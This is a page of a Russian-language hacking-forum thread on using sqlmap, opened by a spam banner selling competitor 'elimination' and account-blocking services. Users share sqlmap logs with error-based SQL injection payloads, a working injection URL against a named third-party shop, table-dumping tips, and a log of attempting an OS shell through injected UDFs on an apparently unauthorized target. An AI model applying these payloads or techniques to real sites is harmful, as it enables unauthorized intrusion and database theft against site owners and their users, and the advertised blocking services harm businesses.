УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 27 из 115

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#261

06.10.2016, 13:26

t0ma5

Постоянный

Регистрация: 10.02.2012

Сообщений: 830

Провел на форуме:
300820

Репутация: 90

masterdolicjakov

sinfo

религия не позволяет включить дебаг в sqlmap и посмотреть какие запросы не работают?

#262

06.10.2016, 13:29

masterdolicjakov

Новичок

Регистрация: 17.09.2016

Сообщений: 6

Провел на форуме:
1489

Репутация: 0

Цитата:

Сообщение от t0ma5

↑
masterdolicjakov
sinfo
религия не позволяет включить дебаг в sqlmap и посмотреть какие запросы не работают?

Доброго вам дня!

Извините, можно поподробней?

#263

06.10.2016, 13:45

sinfo

Новичок

Регистрация: 03.10.2016

Сообщений: 21

Провел на форуме:
4811

Репутация: 0

Цитата:

Сообщение от t0ma5

↑
masterdolicjakov
sinfo
религия не позволяет включить дебаг в sqlmap и посмотреть какие запросы не работают?

[12:47:12] [INFO] testing MySQL

[12:47:12] [PAYLOAD] -8319

[12:47:21] [WARNING] reflective value(s) found and filtering out

[12:47:21] [DEBUG] searching for error chunk length...

[12:47:21] [PAYLOAD] -8315) OR 1 GROUP BY CONCAT(0x7170627071,(SELECT REPEAT(0x34,1024)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#

[12:47:51] [WARNING] turning off pre-connect mechanism because of connection time out(s)

[12:47:51] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)

#264

06.10.2016, 13:51

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//vapenw.com:80/catalogsearch/result/?cat=-3835)+ and extractvalue(0x0a,concat(0x0a,(select database()))) +--+-&product_finished=52&q=1&rating=2[/COLOR][/COLOR]

#265

06.10.2016, 17:20

sinfo

Новичок

Регистрация: 03.10.2016

Сообщений: 21

Провел на форуме:
4811

Репутация: 0

Цитата:

Сообщение от BabaDook

↑

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//vapenw.com:80/catalogsearch/result/?cat=-3835)+ and extractvalue(0x0a,concat(0x0a,(select database()))) +--+-&product_finished=52&q=1&rating=2[/COLOR][/COLOR]

А как в мапе раскрутить?

#266

06.10.2016, 17:27

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от sinfo

↑
А как в мапе раскрутить?

хз

#267

10.10.2016, 17:49

androd

Новичок

Регистрация: 16.09.2016

Сообщений: 17

Провел на форуме:
5429

Репутация: 2

#268

10.10.2016, 18:07

t0ma5

Постоянный

Регистрация: 10.02.2012

Сообщений: 830

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от androd

есть параметр where

Код:

python ../sqlmapproject-sqlmap-ad612bf/sqlmap.py --help | grep where
    --where=DUMPWHERE   Use WHERE condition while table dumping

берешь бубен и пляшеш)

Код:

-C COL              DBMS database table column(s) to enumerate

это на тему колон

"Тоесть там 100к строк,мне нужен дамп с 95К строки как это сделать?" учить как работают лимиты в мускуле думаю никто не будет -_-

#269

10.10.2016, 20:30

sinfo

Новичок

Регистрация: 03.10.2016

Сообщений: 21

Провел на форуме:
4811

Репутация: 0

Пробую слить в дампере,сливает но туго(.Мап выдает вот такое

[13:30:30] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows 8.1 or 2012 R2

web application technology: ASP.NET, Microsoft IIS 8.5, ASP

back-end DBMS: Microsoft SQL Server 2008

[13:30:30] [INFO] fetching columns for table 'Master' in d

atabase 'cation'

[13:30:30] [INFO] the SQL query used returns 54 entries

[13:30:30] [INFO] starting 10 threads

[13:30:31] [INFO] fetching entries for table 'tMaster' in d

atabase 'cation'

[13:30:31] [INFO] resumed:

[13:30:31] [INFO] fetching number of entries for table 'Master

ster' in database 'master'

[13:30:31] [INFO] retrieved:

[13:30:31] [WARNING] multi-threading is considered unsafe in time-based data ret

rieval. Going to switch it off automatically

[13:30:31] [WARNING] (case) time-based comparison requires larger statistical mo

del, please wait.............................. (done)

[13:30:36] [WARNING] it is very important to not stress the network connection d

uring usage of time-based payloads to prevent potential disruptions

[13:30:37] [WARNING] in case of continuous data retrieval problems you are advis

ed to try a switch '--no-cast' or switch '--hex'

[13:30:37] [WARNING] unable to retrieve the number of entries for table 'Master' in database 'cation'

[13:30:37] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 38 times

#270

11.10.2016, 19:28

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

Провел на форуме:
104689

Репутация: 1

Ребят какие команды у сшела на sqlmap

Как залить норм shell

Код:

[18:27:05] [INFO] fingerprinting the back-end DBMS operating system
[18:27:05] [INFO] the back-end DBMS operating system is Linux
[18:27:06] [INFO] testing if current user is DBA
[18:27:06] [INFO] fetching current user
[18:27:07] [WARNING] reflective value(s) found and filtering out
[18:27:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[18:27:07] [WARNING] functionality requested probably does not work because the curent session user is not a database administrator
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[18:27:09] [INFO] checking if UDF 'sys_eval' already exist
[18:27:10] [INFO] checking if UDF 'sys_exec' already exist
[18:27:11] [INFO] detecting back-end DBMS version from its banner
[18:27:11] [INFO] retrieving MySQL plugin directory absolute path
[18:27:12] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ' in 'where clause'
[18:27:12] [INFO] resumed: /usr/lib/mysql/plugin/
[18:27:39] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)
[18:27:53] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[18:27:54] [ERROR] there has been a problem uploading the shared library, it looks like the binary file has not been written on the database underlying file system
do you want to proceed anyway? Beware that the operating system takeover will fail [y/N] y
[18:27:58] [INFO] creating UDF 'sys_eval' from the binary UDF file
[18:27:59] [INFO] creating UDF 'sys_exec' from the binary UDF file
[18:28:01] [INFO] going to use injected sys_eval and sys_exec user-defined functions for operating system command execution
[18:28:01] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>

ссылка на скриншот http://i78.fastpic.ru/big/2016/1011/...54e755fd51.png

Страница 27 из 115

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход